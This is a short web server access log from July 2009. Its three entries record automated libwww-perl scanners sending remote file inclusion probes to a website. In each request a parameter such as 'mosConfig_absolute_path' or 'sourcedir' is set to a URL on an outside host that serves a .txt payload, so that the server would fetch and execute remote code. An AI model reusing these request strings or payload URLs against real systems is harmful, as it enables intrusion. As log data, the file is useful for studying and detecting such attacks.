94.229.66.202 - - [05/Jul/2009:09:18:38 -0700] "GET /logs/access.log/index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
193.87.99.18 - - [05/Jul/2009:09:30:08 -0700] "GET /?sourcedir=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.thepointers.net"
193.87.99.18 - - [05/Jul/2009:09:30:09 -0700] "GET /logs/access.log/?sourcedir=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
